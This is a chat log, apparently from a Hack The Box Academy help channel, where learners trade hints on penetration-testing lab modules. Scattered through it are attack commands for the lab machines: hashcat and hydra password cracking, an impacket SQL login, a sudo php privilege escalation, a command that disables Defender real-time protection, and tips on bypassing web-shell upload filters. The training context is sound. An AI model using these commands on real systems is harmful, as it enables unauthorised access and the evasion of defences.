It asks you to: "Crack the following SHA1 hash using the techniques taught for generating a custom rule: 46244749d1e8fb99c37ad4f14fccb601ed4ae283. Modify the example rule in the beginning of the section to append 2020 to the end of each password attempt."
And I have created the rule, debugged it and confirmed it's doing what it is supposed to do.
But when I try to crack the hash with "sudo hashcat -m 100 hash /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -r rule" command hashcat exhausts all possibilities and quits
I'm wondering if I'm supposed to create a custom wordlist using the rockyou.txt list but was hesitant to try that because it would increase the length and processing time significantly
Also that is never mentioned, not even on the hint: Create a custom rule and combine it with the rockyou.txt wordlist. This exercise was created in the year 2020.
Reread this part again a bit more closely. It may not be super clear on first glance why it's not working.
Modify the example rule in the beginning of the section to append 2020 to the end of each password attempt.
When you complete a section it typically gives you a list of a couple of boxes to try out the information you have learned, once you leave that page is there any way to go back and see the HTB boxes recommended?
Thanks! Will do.
Yes. Just go to the final section in the completed module and hit "Finish" again and it should take you to that completion page with all the recommended boxes & content.
Haha apparently that was the thing I didn't try! TY!
But it would be cool to have a drop down list you could click kinda like the Cheat Sheets.
Password Mutations section's exercise need to be addressed. Been banging my head for the past day trying to find the right rule to crack sam's password. Any other hint except "get rid of first 17k" and "faster on ftp"?
@twin vine brute force ssh
In the active directory module, it has a part on bloodhound in the "Credentialed Enumeration - from Linux " section. How would I connect via freeRDP to the linux system? I have only used it to connect to Windows... "Next, we can type bloodhound from our Linux attack host when logged in using freerdp to start the BloodHound GUI application and upload the data. The credentials are pre-populated on the Linux attack host, but if for some reason a credential prompt is shown, use:"
NVM....Well, once I disconnected my ssh session it let me in just like when I try to connect to windows!
yeah rdp is just rdp, its more common on windows modern day, but its far from windows exclusive
I was trying to do it from another terminal, I didn't think it would matter if I had as ssh connection open as well.
Interestingly enough, I just tried a SSH while the RDP is open and I got right in! Weird enough, but at least I can do what I need from here!
hi
Hi
Hello, you probably have hundreds of people doing this question, but I will do it again, so I am learning programming by myself, and I am a bit lost in what to choose what path should I choose, and I always wanted to learn more about cybersecurity, I don't have to much time because I work 8 hours per day and I want to dedicate 3 to 5 hours per day to study, my question is, is the academy good for beginners or should I learn somethings first, if so what should I learn first before start with the academy? Thank you for your time in helping me out, I appreciate it very much.
@coral mulch academy is a good place when u have some experience but if u are new it may be hard on academy
Oh OK thanks for helping,
I don't want to be disrespectful, but I was thinking in tryhackme first to gain some knowledge and then use hack the box academy
@coral mulch That is a good plan
Hey guys, I'm currently working on the Linux privilege escalation skill assessment, but I got stuck on flag 4. I managed to find the directory for it, the credentials for the tomcat website, but can't manage to escalate my privileges on the machine. Could someone perhaps give me a tip into the right direction?
Hi, I'm trying to do the pivoting tunnelling thing, the part with Rpivot but I can't get to see the webserver home page, connection just times out, any ideas?
I mean I guess i could ssh and curl it but that's not really the spirit of the module lol
No one?
@pliant sage i would help u but i am still stuck on how to transfer the rpivot directory to the attacked machine
@pliant sage yes
have you tried: python3 -m http.server 8080 and then from pivot wget http://<IP>:8080/rpivot?
@placid quest
@pliant sage i did that but still it is not working
aight I'm outta ideas then
@pliant sage ok i will look for another method
hmu if you figure out a way to connect to the web server page
@pliant sage why not i try to use sshuttle to see what happens
what I don't understand is even if I curl the page I only get the apache default page
@pliant sage maybe try to understand where the flag is
What wordlist do I have to use for ||fiona|| on attacking common services easy?
The provided one doesnt work and rockyou will take 84 hours
@unreal patio why not login with anonymous
It doesnt work on the ftp
Whenever I try to target the ftp it bugs out
And when I log in as anonymous it prompts a pw
@unreal patio disconnect and try again
how learn hack
@placid quest I reset the target and still can't log in with anonymous
Hey guys
can anyone help me with Password attacks with Pass the Ticket from Linux section ?
Thank you @placid quest
I am stuck with the last flag of the Deserialization Attacks Module, if someone have a tip to help me 
Htb thm
What's that
Yoo boi what is this server bois?
Tell
Fast
I wanna know
U guys there?
Hello?
Damn
Y u all not responding
Check hackthebox website
This server is to help you learn penetration testing skills. The channel you are in is to help with HTB Academy courses called modules.
Wlr
@coral mulch no problem
There is more than one way to get important information about the service running using that account. Have you tried enumeration through means other than the command line?
Does someone have 1 minute to dm me about attacking common services easy?
Somehow I totally forgot I could upload files to the server, but managed to get a reverse shell and also escalate my privileges to r***, thank you very much for the tip
Hi guys, need some help with the pivoting and tunneling module, RDP and SOCKS Tunneling with SocksOverRDP.
I have done everything as in the lesson, but I can't get the proxifier to work.
- Loaded the DLL
- Created RDP session victor@172.16.5.19 with mstsc.exe
- From the RDP session, ran SocksOverRDP-Server.exe as administrator
- Checked the port is listening on the foothold machine, and it is.
- Set up proxifier as 127.0.0.1:1080 SOCKS5
- Tried to RDP with mstsc.exe as jason@172.16.5.19, but got the login attempt failed
- Tried same as 6, but jason@172.16.6.155, and it failed again.
No problem, glad you solved it!
I am having trouble with this can anyone help me.
Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.
p3ta@kali ~/Downloads> sudo impacket-mssqlclient INLANEFREIGHT/DAMUNDSEN:SQL1234!@10.129.201.234 -windows-auth
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Traceback (most recent call last):
File "/usr/share/doc/python3-impacket/examples/mssqlclient.py", line 169, in <module>
ms_sql.connect()
File "/usr/lib/python3/dist-packages/impacket/tds.py", line 535, in connect
sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused
@simple zephyr did u try with python3
Hi, is there an issue with LinEnum downloads?
I've got it installed on vmbox but it keeps saying 404 on my remote target when I try to download via Python Server.
Unsure if this is an issue anyone else has had?
hey in module "DNS enumeration Using python" in section "DNS Records and queries" i dont find the correct answer for the first question i try multiple answer but nothing... someone for help me please ?
youre trying it against the public provided IP, you need to log into the jump host and run it against the internal IP for the target host.
Cancel my question, for future reference the old reinstall worked ^^;;
Anyone?
@solar granite section
Pivoting, Tunneling, and Port Forwarding module, RDP and SOCKS Tunneling with SocksOverRDP section
@solar granite i am not on that section
What do you mean?
@solar granite i am still on netsh section
Oh
Hi there,
I'm currently doing the web service and api attacks skills assessment.
This is the question Submit the password of the user that has a username of "admin". Answer format: FLAG{string}. Please note that the service will respond successfully only after submitting the proper SQLi payload, otherwise it will hang or throw an error.
I use SQLMap but the htb table does not contain the password column.
Can someone help me to know how to approach the problem?
You are given a WSDL, try using it instead of SQLi
I never got that to work SQLi
yes @solar granite i found this
`|| import requests
payload = f'<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"><soap:Body><LoginRequest xmlns="http://tempuri.org/"><username>onthesauce</username><password>admin</password></LoginRequest></soap:Body></soap:Envelope>'
print(requests.post("http://10.129.84.31:3002/wsdl", data=payload, headers={"SOAPAction":'"Login"'}).content)||`
Thanks I'll play with it after work.
Can I have help with this question in the "Active Directory Enumeration & Attacks" - "Living Off the Land"
I've been googling for a while and I haven't been having luck finding any flags with my dsqueries
Hi guys
After subscribing to VIP, do we has access to the active machines?
to the all*
I think about to subscribe but I don't now
Would you mind rephrasing that statement?
What do you mean?
iirc theres a pretty exact command to run mentioned in the section, the thing it doesn't really warn you about well is that it takes a loooooong time to finish. like 20-30 minutes long. Itll make ya feel as if its hanging but its not.
I could be thinking about a different question however
When you said "I think about to subscribe but I don't now". What did you mean by that?
Sorry, my english is not good at all. I'm thinking about subscribing
No problem. You should subscribe. There's lots to learn and it's worth it. The way I look at it is, I'd probably pay more for Netflix and I'm really not learning anything from shows on Netflix. HTB provides knowledge which can actually increase one's net worth.
I think this is a different question
Yeah I know. I would never pay for useless platforms like netflix. I do ctfs on other platform also and I'm subscribed there (I don't tell the name of the platform because the rules). Because that I was not sure whether I should or not
But I subscribed now
Lol
Now I will test the machines
keep in mind the academy subscriptions are different than the main site subscriptions
Yeah
Are you still stuck? You can dm me if you want
: ( Is the flag in the format HTB{.......} ?
Sorry I'm stupid 
Hi all, I'm stuck on the Tier 1 machine "Appointment", the task 4 doesn't take any of the answers I enter! Can someone help me with that?
yes
But usually this is for modules
can you DM me please?
Sorry, my first message on this channel, I just joined so not very familiar with what goes where
no p
@raven cairn
wassup dude
you completed the Initial Enumeration of the Domain true?
which module what section?
hmmm
It's been a while since I've done it
You can dm me and I can try to help you out when I have a second
We'll get this figured out !!!!!!!
I don't remember using wireshark at all for that section
Hi all, does anyone have experience with the responder.py through a pivoting host (ssh tunnel)? What is better ssh tunnel or chisel?
im a fan of chisel personally
being a socks5 proxy makes things smoother
but also, you cant proxy responder like that to my knowledge
I could be wrong though
its not necessary but it tells me to do it and i want to do it xD
@glad forum this is what you are looking for?
neat, be nicer if there was a guide on using a more modern tool though
Hi all, Footprinting hardlab help please. I've tried everything but the right thing of course. I've seen others have found creds but I dont know where to start looking? struggling to connect to the SSH as I think thats where im going to find my next step.. can i connect anonymously?
ssh has no anon feature
ok thats sorted that one.
u can use a id_rsa with -i
i have a server key....
what u mean with server key
server key is likely to be an id_rsa key
oh
I didnt save notes on that assessment though so idr
i got notes
u can dm me if you want craizi
cheers
Hi there,
I'm currently doing the web service and api attacks skills assessment.
This is the question Submit the password of the user that has a username of "admin". Answer format: FLAG{string}. Please note that the service will respond successfully only after submitting the proper SQLi payload, otherwise it will hang or throw an error.
I use SQLMap but the htb table does not contain the password column.
Can someone help me to know how to approach the problem?
Thanks! I will try it out.
nah its okey, i just was trying to figure out if i was doing something wrong
when you waited 15 minutes for a port scan and realized you used the wrong ip
Fairly stuck on the last part of the knowledge check for Getting Started and all of my notes and web surfing isn't really helping me all too well,
- I've grabbed the user.txt file
- I have a reverse shell (low level priv)
- Target: Root.txt
- required: Root shell
I'm trying to import LinEnum.sh, but on the remote side it keeps giving me permission denied. I can sudo into bin/sh/PHP, but this just breaks the shell (maybe?)
I've been stuck on this for a bit and backtracked in my notes but could use a judge into the right direction or command?
Thanks!
use GTFOBins to find out how to elevate when you have sudo perms as php
I've got one
CMD="/bin/sh" sudo php -r "system($CMD');
But it doesn't work either- I think that may be the one though?
the CMD variable and the sudo command must be on different lines
e.g. submitted one after another
alao you dont have to do the env variable at all
if you think about what its doing you can just run your command directly
Web services and APIs are frequently exposed to provide certain functionalities in a programmatic way between heterogeneous devices and software components. Both web services and APIs can assist in integrating different applications or facilitate separation within a given application. This module covers how to identify the functionality a web se...
Got it, I'll give it a try, fingers crossed!
run the scan and find out
It worked yaaaay ^^
Hi guys, need some help on Login Bruteforcing Skill Assessment I , question 2.
My command is
hydra -l user -P /usr/share/wordlists/rockyou.txt 134.209.186.13 -s 30720 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='log-in'"
Been running for a while now, feels wrong. Any tips?
Hi there, I'm working on linux fundamentals and I can't figure out how to use the locate command for a question
Here's what I have so far
||find -user root -newermt 2020-03-03 -name *.conf -size +25k -size -28k||
I think the problem is that it's trying to find files you need root for but I added the option for it to not
appending "2>/dev/null" will get rid of the errors
Ty lol I haven't found it yet but I'll specify that
hint the ||parameter||
watching a 22 hour video of god of war ragnarok gameplay (because i don't have a ps5)
so you can answer both of the question in that section with nmap
yeah i know but i wanted to open wireshark @vital adder
oh the given machine through ssh?
oh wait you can use xfreerdp to rdp in and open wireshark from there
@vital adder yeah but i cant use it bcs i cant run wireshark with privileges
and when i try to wireshark -i {interface} it says me that i dont have permissions
i also tried with sudo:
Hello, I'm stuck on skill assessment login bruteforcing, any clue?
which one
sure what's the issue
yea the pwnbox have the same issue
im using pwnbox
oh i mean the pwnbox have the same issue with wireshark can't run as root or with sudo
ohok
hello May I please get some assistance with Getting Started foothold for knowledge check. I believe the exploit is the Arbitrary file upload but I am having issues executing it. I don't know if I am on the correct page or not. Thank you
oh for that i did noted down i wasn't able to get the upload thing to work so that still may still be the right path but i use a different method
nope for me a get a shell through ||theme||
I got in with metasploit
didnt take any notes on that module though, it went smoothly
yeah I wanted the exploit that I had to work I just don't know where to upload it
I am thinking that @vital adder used curl ?
no idea but it could be a rabbit hole
k
if I am escalating privileges how can I use the usr/bin/php to escalate to root?
do I have to edit the php ?
gtfobins
rule of thumb: if you have sudo rights over a programming language interpreter you can just use it to spawn a shell directly, as the shell will inherit the perms of the interpreter.
So, how long did it take you guys to crack the Passwords Mutations module? I've grown a beard and mowed my lawn with a pair of nail clippers and this thing still isn't cracked
Oh thanks man, didn't notice it at first, changed it accordingly and it worked
A long time. You can reduce the size of the list by ||checking out the password policies|| , but it will still take a while.
takes ages. Worst part is the whole module you have little way of telling if something is just taking long or if you messed up somewhere
its my least fav module overall
Glad to know I'm not alone. I'll try and read War and Peace in the meantime lol
Just to ensure I'm on the right track, I took the custom.rule list and plugged it into hashcat, along with the password.list that was provided. CMD: hashcat --force password.list -r custom.rule --stdout > mut_password.list
For the Pivot skills assessment how in the hell do you get the lsass off the remote windows machine? I'm losing my mind trying to get it
or you can get ||mimikatz|| to that machine
the Av wouldn't remove it?
i think you can just disable it
I tried it wont work
I tried getting a msfvenom on it but the av is stopping it
I tried base64 the lsass dump but that took to long to calculate q.q
That command looks right, you could also pipe it to sort -u, just in case there are any duplicates. I remember ending up with like 90k+ passwords
i mean disable the real time protection
Thanks! Hopefully it won't take too much longer
if it is taking too long remove the first 17000 word from the mutated wordlist
||Set-MpPreference -DisableRealtimeMonitoring $true|| does not work, returns an error
Just use the normal Windows settings
first did you use powershell -ep Bypass before that and i mean in the windows security
I don't remember messing around with AV much in that module.
you can also try secretsdump.py but it can miss things mimikatz doesnt.
Can I talk to you about the way you went about getting the foothold I already completed it
sure
crackmapexec also has an lsass dumping module but Ive not tried it
And by "normal Windows settings", I mean just go into the settings menu and turn off all stuff regarding AV. I had this same issue.
hi can someone please help with Pass the Hash (PtH) - Using David's hash, perform a Pass the Hash attack to connect to the shared folder \\DC01\david and read the file david.txt.
whats the issue youre having with
Anyone around for a question on the medium lab for the footprinting module? I've found creds for the ||mssql server studio|| from ||smb share||, but they keep erroring out when attempting to log onto the server...
all good just got it.. thank you
Are you trying to login from the command line on Kali?
No, I'm currently trying to log into the microsoft sql server
Here is the error i'm currently receiving
||||
Getting that using both 'sa' and Administrator, with the password from the smb share
Trying to remember what I did here. I should've taken better notes.
Hah all good. I've tried it without the "win..." as well, for good measure
But keeps erroring out
Not sure what I'm missing
Are you using Microsoft SQL Server Management Studio 18?
yep yep
go back and look over your scan results again
That's odd. I just logged in over RDP w/ Administrator and that password and had no problem opening the studio
iirc this is one where the mssql server is publicly facing
hmmm, i'm currently rdp'd as the user alex
Log in as the Administrator
Can anyone help with a hint for the final Footprinting - DNS question? I've tried all seclists wordlists and can't find the answer.
have you also enumerated on the initial subdomains you found?
like you found blah.inlanefreight.htb have you also checked for anything under *.blah.inlanefreight.htb
what is the best tool for enumerating subdomains further? gobuster or continue using DNSenum
im a fan of gobuster personally, but whatever works really
gobuster is more vhosts though
idk if it does actual DNS queries
Oh, it does, yeah I'd go with gobuster
@thorn urchin not working with gobuster
I've always used ffuf for my subdomain enumeration
ๆไผๆธ้็ๅ
Anyone want to do boxes together? If a group of us do it together we can discuss how we did it. Could be a nice way to learn
Please post in English
I think rule 5 is dumb tbh
finally figured out where i fucked up in the password mutations module
Someone help me with JuicyPotato
How do I find the CLSID and port from the machine for the Windows escalation?
I have a Question on Active Directory --Credentialed Enumeration - from Windows-- There is a section on PowerView, none of the commands listed in the reading seem to work. What step am I missing here? Do I need to do something like Import-Module PowerView (which I tried)? I see powerview.ps1 in the Tools directory and tried importing that as well... Thanks for any insight!!
NVM.... I figured it out. ||Import-Module c:\tools\PowerView.ps1|| in case it helps someone else. Thanks!
Can you link that module?
Oh, thats skill assessment. Did you find vulnerable parameter?
And btw, don't try to read the passwd file; find other PHP files on that web app and read them, you will find one path once you decode that.
I haven't tried reading that, but it did not matter for me; what really matters first for me is to read and find all available files on that web app.
Welcome.
Remember to use filters.
Can I have some help with this question?
I don't want the answer, I just wanna know how to do it.
Submit the broadcast address of the following CIDR: 10.200.20.0/27
Because I'm not really sure how the CIDR IP is created.
I may have just figured it out, correct me if I'm wrong: in binary the subnet mask is 11111111.11111111.11111111.11100000; the last 8 bits have a decimal value of 224. Subtracting from the maximum subnet mask value you can have, 255, you get 31.
so the answer is 10.200.20.31
Looks correct to me
Hello. Is there a way to reformat an SSH key? Couldn't find a way to google that. I have found an SSH private key in a message on a POP mail server. Couldn't figure out a way to save it correctly; ssh always says invalid format. It starts with -----BEGIN OPENSSH PRIVATE KEY----- and ends with ----end etc., so it's not like something is missing; I guess just the format of the .txt file is wrong, like missed spaces or something like that. How can I fix it?
Hello all,
I'm trying to solve the 'Blacklisted Filters' question from the 'File Upload' module. I managed to find an extension that I could use to run my exploit but my browser displays this error message in the console:
"""
The character encoding of the HTML document was not declared. The document will render with garbled text in some browser configurations if the document contains characters from outside the US-ASCII range. The character encoding of the page must be declared in the document or in the transfer protocol.
"""
Does anyone know how to circumvent this problem?
Thanks in advance for your help.
If it's a browser-level error, couldn't you go around that by using an intermediary HTTP proxy like Burp? IIRC the aim is to upload a file directly to the web server, so you can just talk directly to the API without going through the browser
Well, after attempting the Burp approach, I may think that there is a misconfiguration in the server. As a matter of fact, I'm getting the aforementioned error because the content of my web shell script is sent back to my client. Normally it should be executed on the server side. The example given in the section uses .phtml and in the next section (Whitelist filters) it is indicated that Apache accepts to execute a file with this extension:
<FilesMatch ".+\.ph(ar|p|tml)">
    SetHandler application/x-httpd-php
</FilesMatch>
However the different extensions that could be used to bypass the blacklisted filters are not mentioned.
hi
It sounds like you're able to upload files using a specific extension, but your web shell is not executing commands? Like, you can see it in your browser when you fetch it?
One possibility is that the extension you used doesn't work with the current web server configuration. So maybe try others.
I have just tested another extension that was not listed in the web-extensions file (SecLists) and it worked. Thanks for the help
Nice! Glad it worked out for you :)
Hi, I need some help with Pivoting, Tunneling and Port Forwarding module skills assessment. I have got access to the foothold machine as ||webadmin||, and pivoted to ||172.16.5.35|| as ||mlefay||. From there I found the credentials for ||vfrank||, and connected to ||172.16.6.35||. My problem is, now I can't find any other host on the ||172.16.6.0/24|| network. Any hints?
Edit: solved. Leaving it up in case anyone has this issue in the future.
Hint: ||make sure to ping sweep multiple times. For some reason, it doesn't respond to the first ping it gets.||
Hello everyone, I am doing the Intro to Bash Scripting Module in the Comparison Operators section.
I am having trouble getting the answer. I am not sure what is wrong with my script; I have two comparison expressions and get a seemingly expected output, although it's not correct.
I'd appreciate any help
I can help. DM me your script
Hi, I'm on the Bruteforcing module doing the Skill Assessment on the website, but I'm stuck. We're supposed to bruteforce the login form that prompts when going to the IP, but we're given no information on what to bruteforce it with?
Hey guys, need some help with the Pivoting, Tunneling and Port Forwarding module skills assessment. I have found every host and the DC (||172.16.10.5||), but I can't connect to it from ||vfrank@172.16.10.25||. The DC responds to pings, but when trying mstsc.exe it says the host is down.
You need to further enum, what you're looking for isn't in this network
I feel like further enumeration of other networks would take forever. Can I DM you?
Sure!
Just throwing this out there. As you develop skills doing HTB boxes, labs and Academy modules, don't forget to update your CV/resume. These skills are in high demand right now and you'll have some great talking points to discuss in interviews. Make sure to use keywords and not just mention "Finished this module...". Say things like: "Learned and developed a methodology for assessing the security of web applications manually and using tools such as Burp Suite & OWASP ZAP". Also be sure to mention Active Directory, pivoting and many of the endless variety of topics taught through Academy.
"Mapped drive." That's the hint I got.
Finally finished AD Enumeration and Attacks after 2 whole months... probably wouldn't have been able to complete the assessments without the hints littered across Discord.
Sounds like a good opportunity to start with the basic defaults
@analog junco hydra maybe
Congrats haha. Currently on that module
It's a long one for sure
I'm working on the WordPress module